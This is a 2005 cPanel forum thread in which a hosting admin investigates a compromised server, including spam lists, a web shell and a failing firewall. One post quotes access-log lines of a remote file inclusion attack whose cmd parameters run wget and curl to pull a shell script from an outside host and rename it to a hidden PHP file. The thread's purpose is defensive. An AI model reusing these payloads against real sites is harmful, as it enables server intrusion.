Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

possibly hacked ?

Discussion in 'General Discussion' started by ctbhost, Jul 30, 2005.

  1. ctbhost

    ctbhost Well-Known Member

    Joined:
    May 31, 2002
    Messages:
    139
    Likes Received:
    0
    Trophy Points:
    316
    in my /tmp directory there was a folder named /.x whitch contained the following files

    failed.txt
    Norte11.txt
    Norte12.txt
    Norte13.txt
    Norte14.txt
    ocarteiro.htm
    ocarteiro.txt
    ok.txt

    the Nortel files contained lists of email addresses,

    what i was wondering is how could these files be placed on the server and where, if anywhere in the loggs can i trace the source of the hacker

    i have deleted the files and the folder from the server but really want to know what i can do to stop this happening again.

    about 6 months ago i secured my server using the information in this thread http://forums.cpanel.net/showthread.php?t=30159 and the instruction on http://eth0.us/

    maybe there is something else i need to do
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,460
    Likes Received:
    21
    Trophy Points:
    463
    Location:
    Go on, have a guess
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  3. ctbhost

    ctbhost Well-Known Member

    Joined:
    May 31, 2002
    Messages:
    139
    Likes Received:
    0
    Trophy Points:
    316
    thanks for that - i found a php script called .admin.php that allows the user to execute commands on the users home directory.

    only problem is the script was created the day before the loggs stsrt so i cant seem to see how it was uploaded.
     
  4. ctbhost

    ctbhost Well-Known Member

    Joined:
    May 31, 2002
    Messages:
    139
    Likes Received:
    0
    Trophy Points:
    316
    in my error_log i found a heap of lines like this

    i have BFD and APF installed - shouldnt BFD blocked this ip address due to so many failed attempts in such a short time ??

    [Sun Jul 31 03:28:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:28:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:28:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:28:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:28:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:28:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:28:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:28:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:57 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:57 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:30:00 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:30:08 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:30:09 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:30:09 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:30:09 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:30:09 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
     
  5. linux-image

    linux-image Well-Known Member

    Joined:
    Jun 8, 2004
    Messages:
    1,191
    Likes Received:
    1
    Trophy Points:
    168
    Location:
    India
    cPanel Access Level:
    Root Administrator
    BFD should have stopped that. as a quick heed,

    touch /home/avi/public_html/403.shtml

    as root on shell. aleast u will save the bandwidth.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  6. ctbhost

    ctbhost Well-Known Member

    Joined:
    May 31, 2002
    Messages:
    139
    Likes Received:
    0
    Trophy Points:
    316
    yeh i understand what your saying but im more interested in why BFD didnt pick it up - is there a way to check that bfd is working ??
     
  7. linux-image

    linux-image Well-Known Member

    Joined:
    Jun 8, 2004
    Messages:
    1,191
    Likes Received:
    1
    Trophy Points:
    168
    Location:
    India
    cPanel Access Level:
    Root Administrator
    had it had worked, you wouldnt have got so many access in the logs.

    in case you wanna test, you will need to write a script that access a particular file say 100 times in a loop and see if bdf pcks it up.

    alternatively i shld say that mod_dosevasive is very effective to prevent dos.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  8. ctbhost

    ctbhost Well-Known Member

    Joined:
    May 31, 2002
    Messages:
    139
    Likes Received:
    0
    Trophy Points:
    316
    seems that APF isnt working

    i try to to restart apf with apf -r

    and i get the error below - any idea what this means

    iptables v1.2.9: host/network `at' not found
    Try `iptables -h' or 'iptables --help' for more information.
    iptables v1.2.9: host/network `at' not found
    Try `iptables -h' or 'iptables --help' for more information.
     
  9. ctbhost

    ctbhost Well-Known Member

    Joined:
    May 31, 2002
    Messages:
    139
    Likes Received:
    0
    Trophy Points:
    316
    found the problem
    in /etc/apf/deny_hosts.rules there was the blocked ip list and one called 'at' i removed that and all fixed
     
  10. ctbhost

    ctbhost Well-Known Member

    Joined:
    May 31, 2002
    Messages:
    139
    Likes Received:
    0
    Trophy Points:
    316
    i have figured out how the hacker is getting in but how do i stop them.
    in the logs there are the following entries

    GET /index.php?show=http://www.lolsys.org/cse.gif?&cmd=cd%20ice HTTP/1.1" 200 10076 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    GET /index.php?show=http://www.lolsys.org/cse.gif?&cmd=cd%20ice;pwd HTTP/1.1" 200 10112 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    GET /index.php?show=http://www.lolsys.org/cse.gif?&cmd=cd%20ice;rm%20-rf%20.index.php HTTP/1.1" 200 10076 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    GET /index.php?show=http://www.lolsys.org/cse.gif?&cmd=cd%20ice;wget%20www.lolsys.org/admin.txt HTTP/1.1" 200 10128 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    GET /index.php?show=http://www.lolsys.org/cse.gif?&cmd=cd%20ice;curl%20-o%20admin.txt%20www.lolsys.org/admin.txt HTTP/1.1" 200 10365 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    GET /index.php?show=http://www.lolsys.org/cse.gif?&cmd=cd%20ice;mv%20admin.txt%20.look.php HTTP/1.1" 200 10076 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    GET /ice/.look.php?password=aihdffa HTTP/1.1" 200 1116 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"


    if it enter these in the brouser after the domain name i get a page that has
    ------------------------------------------------------------------
    Sidewinder Command/Safemode Exploit 4.1


    System Information
    sysname: Linux
    nodename: [my host name]
    Release: 2.4.22-1.2199.nptl
    version: #1 Wed Aug 4 12:25:07 EDT 2004
    machine: i686

    Script Current User: USERNANME
    PHP Version: 5.0.4
    User Info: uid(32020) euid(32020) gid(522)
    Current Path: /home/user/public_html
    Server IP: xxx.xxx.xxx.xxx
    Web Server: Apache


    [*] Command Mode Run
    Command Stdout
    ------------------------------------------------------------

    any idea how to protect against this type of attack

    would not allowing the string http:// in the "?show=" variable be enough or is there a better way
     
  11. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,460
    Likes Received:
    21
    Trophy Points:
    463
    Location:
    Go on, have a guess
    You need to remove and then fix whatever that index.php script is. It's clearly exploitable.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  12. ctbhost

    ctbhost Well-Known Member

    Joined:
    May 31, 2002
    Messages:
    139
    Likes Received:
    0
    Trophy Points:
    316
    yeh have found the problem - was written when i was real new to PHP and open to exploit - i have put some extra scruipting in to not allow various charactors that should stop them

    just gota wrk out why BFD isnt working
     
    #12 ctbhost, Aug 9, 2005
    Last edited: Aug 9, 2005
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice